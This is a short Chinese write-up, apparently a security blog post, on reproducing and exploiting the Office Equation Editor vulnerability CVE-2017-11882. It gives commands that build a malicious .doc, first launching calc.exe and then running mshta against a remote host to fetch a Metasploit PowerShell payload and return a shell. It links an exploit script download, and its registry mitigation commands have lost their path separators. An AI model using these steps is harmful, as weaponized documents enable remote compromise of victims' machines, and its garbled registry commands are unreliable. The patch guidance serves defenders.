0x00 前言
最新Office的CVE-2017-11882的poc刚刚发布出来,让人眼前一亮,完美无弹窗,无视宏,影响Ms offcie全版本,对于企业来说危害很大。在此简单说下这个漏洞的复现和利用过程。各位师傅勿喷,T_T。文末附脚本
0x01 复现过程
国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882
这里我们使用的是Ridter师傅改进过的脚本:https://github.com/Ridter/CVE-2017-11882/
生成漏洞doc文件,执行计算器命令如下:
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
使用office 2013打开,直接执行。
0x02 进一步利用
1.首先利用msf生成利用的powershell脚本
这里有个小技巧,因为命令长度有43字符的限制,可以使用URIPATH设置路径,尽量短一点,避免加起来超过43字符。
2.然后就生成漏洞doc了,使用mshta去执行
python Command_CVE-2017-11882.py -c "mshta http://192.168.1.123:8080/123" -o test.doc
3.使用 office打开
成功返回shell,一套操作行云流水。
0x03 修复方案
1.下载微软对此漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,并且开启自动更新功能
2.在注册表中禁用该漏洞模块
reg add "HKLMSOFTWAREMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLMSOFTWAREWow6432NodeMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400
#############
以下脚本仅供个人测试验证使用,请在下载后24小时内删除,不得用于任何非法用途,否则后果自负。当你打开链接时候就默认你遵守以上。
MSF链接:http://pan.baidu.com/s/1qYt8dlE 密码:ni0w
